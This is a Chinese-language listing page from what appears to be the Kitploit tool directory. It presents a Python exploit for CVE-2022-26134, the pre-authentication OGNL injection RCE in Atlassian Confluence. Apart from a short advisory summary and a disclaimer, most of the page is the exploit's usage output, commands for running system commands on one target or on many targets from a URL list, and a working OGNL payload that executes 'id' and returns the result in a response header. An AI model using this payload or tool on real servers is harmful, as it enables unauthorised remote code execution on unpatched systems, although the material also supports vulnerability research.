Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
-CVE-2022-26134 — Python 漏洞利用工具,用于通过 OGNL 注入实现 Confluence Server/Data Center 的预认证远程代码执行 (CVE-2022-26134)。支持单目标和多目标执行,具备命令注入和线程扫描功能。 | Kitploit
工具/GitHubGitHub/darkstuff-lab/-cve-2022-26134
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubdarkstuff-lab/-cve-2022-26134

-CVE-2022-26134

Python 漏洞利用工具,用于通过 OGNL 注入实现 Confluence Server/Data Center 的预认证远程代码执行 (CVE-2022-26134)。支持单目标和多目标执行,具备命令注入和线程扫描功能。

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Confluence 预认证远程代码执行(OGNL 注入)(CVE-2022-26134)

Confluence 预认证远程代码执行(OGNL 注入)(CVE-2022-26134)

  • 2022年6月2日,Atlassian 发布了其 Confluence Server 和 Data Center 应用的安全公告,强调了一个严重级别的未认证远程代码执行漏洞。该 OGNL 注入漏洞允许未认证用户在 Confluence Server 或 Data Center 实例上执行任意代码。

重要说明

该漏洞利用工具仅用于研究人员演示漏洞。我不建议任何非法行为,也不对任何恶意使用此脚本的行为负责。

• 请求示例

BurpRequest

漏洞利用使用说明

root@kitploit:~
python3 exploit.py -h
Usage: exploit.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     Base target uri (ex. http://target-uri/)
  -f FILEHOSTS, --file=FILEHOSTS
                        example.txt
  -t THREADS_SET, --threads=THREADS_SET
  -m TIMEOUT, --maxtimeout=TIMEOUT
  -o OUTPUT, --output=OUTPUT
  -c COMMAND, --cmd=COMMAND

单个目标利用:

$ python3 exploit.py -u http://xxxxx.com -c id

xpl1

多目标利用

$ python3 exploit.py -f urls.txt -p -c id

xpl2

OGNL 表达式

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

参考链接:

• https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

• https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

下载工具